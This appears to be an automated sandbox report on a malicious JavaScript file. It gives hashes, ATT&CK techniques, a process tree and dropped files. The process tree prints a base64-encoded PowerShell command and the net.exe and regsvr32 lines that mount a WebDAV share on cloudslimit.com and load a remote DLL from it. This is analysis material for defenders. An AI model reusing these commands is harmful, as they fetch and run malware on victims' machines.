4f85809b3bc35cf82796af6a2d8ecf2afa91673a63ba1e1e7e91f45b9b7e9622

Resubmissions

23/07/2024, 12:32

240723-pqy1xazcrn 7

23/07/2024, 12:30

240723-pptpsszclp 7

23/07/2024, 12:25

240723-plpxfasekc 3

23/07/2024, 11:25

240723-nja5tstane 7

Analysis

max time kernel
315s
max time network
406s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23/07/2024, 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

509796302373421174.js
Size

16KB
MD5

d0a2db4f470f5c1e8685de93c9540aa1
SHA1

29cc30ba0638c236df388b78ec2e23d151bfa606
SHA256

4f85809b3bc35cf82796af6a2d8ecf2afa91673a63ba1e1e7e91f45b9b7e9622
SHA512

f1f668bee0d27de479256e306519f558bd14d657e45c0a1f3f7523e5ac00688cbf06dd87f4b387e8f16bec4424014a7b37e7322e077943eed8b700ff08a8406a
SSDEEP

96:joMAiwH1hNkOWPw6Kb1+4a5DOgAo31yRbcpP4iWnwrdDUnqEnI5yc9gAzdHemwFw:WNMAs1EIpJJuy8AmISbppU

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3700	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
2296	sdiagnhost.exe
2296	sdiagnhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	2296	sdiagnhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1900	msdt.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 3700	4384	wscript.exe	73
PID 4384 wrote to memory of 3700	4384	wscript.exe	73
PID 3700 wrote to memory of 4244	3700	powershell.exe	75
PID 3700 wrote to memory of 4244	3700	powershell.exe	75
PID 3700 wrote to memory of 4844	3700	powershell.exe	76
PID 3700 wrote to memory of 4844	3700	powershell.exe	76
PID 1168 wrote to memory of 1900	1168	rundll32.exe	80
PID 1168 wrote to memory of 1900	1168	rundll32.exe	80

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\509796302373421174.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANQA3ADMAOAAxADgANgAyADgAOQAwADAALgBkAGwAbAA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
    3⤵
    PID:4244
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\14573818628900.dll
    3⤵
    PID:4844

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s fdPHost
1⤵
PID:1400

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\Admin\AppData\Local\Temp\NDF37EA.tmp
1⤵
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Windows\system32\msdt.exe
  -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDF37EA.tmp" -ep "NetworkDiagnosticsSharing"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1900

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024072312.000\NetworkDiagnostics.debugreport.xml

Filesize
68KB

MD5
8c8f32b23924108658ca6a1d4bd68e60

SHA1
9ca94511dd8b5b02aadcc4ecb76444cca38c61de

SHA256
a1c7afa81155a58b2b46d57ea0c0b56384a4c13b050e60a2b403495172cc89e3

SHA512
271411fee7b41abebb5f4726e382cb12cce4265a0d04bfa30a1be50810a21f044bf07a7ad0979fcb15dd27785291d9bcbf15362bd0c1a8b2108672abbda901c1

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024072312.000\results.xsl

Filesize
47KB

MD5
310e1da2344ba6ca96666fb639840ea9

SHA1
e8694edf9ee68782aa1de05470b884cc1a0e1ded

SHA256
67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c

SHA512
62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaqmv4b4.ikp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\TEMP\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\NetworkDiagnosticsTroubleshoot.ps1

Filesize
23KB

MD5
d18dd3c5d111eecbfec65251d357f3c1

SHA1
5cec3df9e5f7fe3ea0d7226e1461da2de2fad900

SHA256
fc9ce9f57cb224d13ea1b973fa084e8f7fd00dd172d84b7c14e31085c58fea5d

SHA512
6ce2eac565c0fc921f07881c2bb64ba73c670562a8b86456d718c1a75ab6097f623d49a608aa984075d1d764dcdca9b1cd95704f6bf817e7b1081b7b5ae0a7ce

Download Submit
C:\Windows\TEMP\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\UtilityFunctions.ps1

Filesize
53KB

MD5
c912faa190464ce7dec867464c35a8dc

SHA1
d1c6482dad37720db6bdc594c4757914d1b1dd70

SHA256
3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201

SHA512
5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a

Download Submit
C:\Windows\TEMP\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\UtilitySetConstants.ps1

Filesize
2KB

MD5
0c75ae5e75c3e181d13768909c8240ba

SHA1
288403fc4bedaacebccf4f74d3073f082ef70eb9

SHA256
de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f

SHA512
8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b

Download Submit
C:\Windows\TEMP\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\en-US\LocalizationData.psd1

Filesize
5KB

MD5
91e3038ec5ddc6a0924607b192117a68

SHA1
af46db32086ddd72fbf759ed136f7e66ad5b5b43

SHA256
7e23e58cc90aa265464cb2f5a9da9f2a04ba2541e84ab26a052cc17155a91080

SHA512
fc745c310d0157df2f588dc4f9b991c484712f7935b6e4128e02433c2a2b9cda2daf959af006f63c55a5a9a4e0c8e4caaa4c86d7a65a626d55822097dcb7fd84

Download Submit
C:\Windows\Temp\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\DiagPackage.dll

Filesize
478KB

MD5
b41a1b66b931cd9eec462d4ebc0b7882

SHA1
c7cc141475040cb310a54644dc9b31bab611ae17

SHA256
053d37c266c78a37606bf3afc12434e2a8a506929659f39f49b730c434f29351

SHA512
cdf8121535b0454e5d1cf8303865e74a0aa339f27cd9229656cd7e4e95735eaaf7670805d770b3a915799f9c86099730656397069e92847f17996b924895f57c

Download Submit
C:\Windows\Temp\SDIAG_a785e406-cb16-4f1f-a899-ed4481dbaf36\en-US\DiagPackage.dll.mui

Filesize
14KB

MD5
8703029bba82e646f86aac7fdf7cd565

SHA1
865db3122262ad8796b27c5329eadebb4108c82d

SHA256
07cc054e7cb7eb5ebc67ccc923e1d92598d1f7f525fdacfc08260b97b6a4ac26

SHA512
af493f1cb6522d888ec1f6e4190613a9372485f7230ee7e86ceeea91912c78c44e559c49a80053e90de895d69fe52bf719f389b6f16f0c349bc48b9899fabf9e

Download Submit
memory/3700-9-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3700-20-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3700-24-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3700-0-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

Filesize
4KB

Download
memory/3700-8-0x000001C97D5E0000-0x000001C97D656000-memory.dmp

Filesize
472KB

Download
memory/3700-5-0x000001C97D530000-0x000001C97D552000-memory.dmp

Filesize
136KB

Download